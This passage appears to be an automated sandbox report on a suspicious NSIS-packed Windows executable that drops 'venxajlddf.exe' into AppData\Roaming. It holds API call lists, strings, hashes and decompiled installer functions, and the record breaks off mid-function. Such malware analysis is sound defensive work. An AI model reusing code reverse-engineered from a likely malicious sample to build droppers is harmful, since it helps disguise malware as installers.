lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\venxajlddf.exe,00000000,?), ref: 00403A8F
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
CopyFileW.KERNEL32 ref: 00403B21
CloseHandle.KERNEL32(00000000), ref: 00403B4E
OleUninitialize.OLE32 ref: 00403B71
ExitProcess.KERNEL32 ref: 00403B8B
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
ExitProcess.KERNEL32 ref: 00403C1F

Strings

NSIS Error, xrefs: 004037A1
C:\Users\user\AppData\Local\Temp, xrefs: 00403901, 00403A30, 00403AB7, 00403AC1
C:\Users\user\AppData\Roaming\venxajlddf.exe, xrefs: 00403B1C
C:\Users\user\AppData\Roaming\venxajlddf.exe, xrefs: 004037B6, 004037BC, 004037D1, 004039A8, 004039B4, 00403A02, 00403A0C
C:\Users\user\AppData\Local\Temp, xrefs: 00403A3B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403911, 00403916, 0040392C, 00403938, 00403947, 00403954, 00403960, 00403968, 00403A66, 00403A77, 00403A82, 00403A8E, 00403A9F, 00403AAE, 00403B64
1033, xrefs: 0040397D
Low, xrefs: 0040394F
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403659
TMP, xrefs: 00403969
UXTHEME, xrefs: 0040372E, 00403733, 00403739
Error launching installer, xrefs: 00403A12
\Temp, xrefs: 00403933
.tmp, xrefs: 00403A7D
SeShutdownPrivilege, xrefs: 00403BB4
~nsu, xrefs: 00403A61
C:\Users\user\AppData\Roaming, xrefs: 00403A88, 00403A8D, 00403AC0
TEMP, xrefs: 00403961

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\venxajlddf.exe$C:\Users\user\AppData\Roaming\venxajlddf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-2571839397
Opcode ID: f3ac1498e1d688579d7258b622a0b5d50c25907720076392c60a7523a2d29bb1
Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
Opcode Fuzzy Hash: f3ac1498e1d688579d7258b622a0b5d50c25907720076392c60a7523a2d29bb1
Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x00405811
0x00405817
0x00405821
0x00405824
0x004059ba
0x004059d7
0x004059de
0x004059de
0x004059f1
0x00405a0f
0x00405a11
0x00405a19
0x00405a6f
0x00405a73
0x00000000
0x00000000
0x00405a75
0x00405a7b
0x00000000
0x00000000
0x00405a85
0x00405a8d
0x00405a90
0x00405b92
0x00000000
0x00405b92
0x00405a9f
0x00405aaa
0x00405ab3
0x00405abe
0x00405ac1
0x00405aca
0x00405ad0
0x00405ad3
0x00405ad3
0x00405aeb
0x00405af4
0x00405af7
0x00405afe
0x00405b05
0x00405b0d
0x00405b0d
0x00405b24
0x00405b24
0x00405b2b
0x00405b31
0x00405b3d
0x00405b44
0x00405b4d
0x00405b4f
0x00405b52
0x00405b61
0x00405b64
0x00405b6a
0x00405b6b
0x00405b71
0x00405b72
0x00405b73
0x00405b7b
0x00405b86
0x00405b8c
0x00405b8c
0x00000000
0x00405aeb
0x00405a21
0x00405a51
0x00405a59
0x00405a64
0x00405a64
0x00405a6a
0x00000000
0x00405a6a
0x00405a25
0x00405a2f
0x00000000
0x004059f3
0x004059f9
0x00405a34
0x00000000
0x00405a3d
0x00405a02
0x00405a07
0x00405a0a
0x00000000
0x00405a0a
0x004059f1
0x0040582a
0x0040582e
0x00405836
0x0040583a
0x0040583d
0x00405840
0x00405843
0x00405846
0x00405847
0x00405848
0x00405861
0x00405864
0x0040586e
0x0040587d
0x00405885
0x0040588d
0x00405892
0x00405895
0x004058a1
0x004058aa
0x004058b3
0x004058d5
0x004058db
0x004058ec
0x004058f1
0x004058ff
0x0040590d
0x0040590d
0x00405912
0x00405920
0x00405920
0x00405925
0x00405928
0x0040592d
0x00405939
0x00405942
0x0040594f
0x0040595e
0x00405951
0x00405956
0x00405956
0x0040596a
0x0040596a
0x0040597e
0x00405987
0x00405990
0x004059a0
0x004059ac
0x004059ac
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405867
GetDlgItem.USER32(?,000003EE), ref: 00405876
GetClientRect.USER32 ref: 004058B3
GetSystemMetrics.USER32 ref: 004058BA
SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
ShowWindow.USER32(00000000,?), ref: 00405942
ShowWindow.USER32(?,00000008), ref: 00405956
GetDlgItem.USER32(?,000003EC), ref: 00405977
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
GetDlgItem.USER32(?,000003F8), ref: 00405885

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

GetDlgItem.USER32(?,000003EC), ref: 004059C9
CreateThread.KERNELBASE(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
CloseHandle.KERNELBASE(00000000), ref: 004059DE
ShowWindow.USER32(00000000), ref: 00405A02
ShowWindow.USER32(?,00000008), ref: 00405A07
ShowWindow.USER32(00000008), ref: 00405A51
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
CreatePopupMenu.USER32 ref: 00405A96
AppendMenuW.USER32 ref: 00405AAA
GetWindowRect.USER32(?,?), ref: 00405ACA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
OpenClipboard.USER32(00000000), ref: 00405B2B
EmptyClipboard.USER32 ref: 00405B31
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
GlobalLock.KERNEL32 ref: 00405B47
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
SetClipboardData.USER32 ref: 00405B86
CloseClipboard.USER32 ref: 00405B8C

Strings

H7B, xrefs: 00405AF7
{, xrefs: 00405A6F

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H7B${
API String ID: 590372296-2256286769
Opcode ID: acb4607de909606c36dfaba2b406014313c5fa90e55702556e162a5684d31028
Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
Opcode Fuzzy Hash: acb4607de909606c36dfaba2b406014313c5fa90e55702556e162a5684d31028
Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68

Uniqueness

Uniqueness Score: -1.00%

Function 73BF1BFF Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E73BF1BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				void* _t255;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E73BF12BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E73BF12BB();
				_t321 = E73BF12E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t332 = _t255;
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E73BF13B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E73BF162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x73bf23e8) & 0x000000ff) * 4 +  &M73BF235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E73BF12CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E73BF12BB();
											 &_v12 = E73BF1B86( &_v12);
											__eax = E73BF1510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E73BF1B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E73BF1B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x73bf405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E73BF1B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
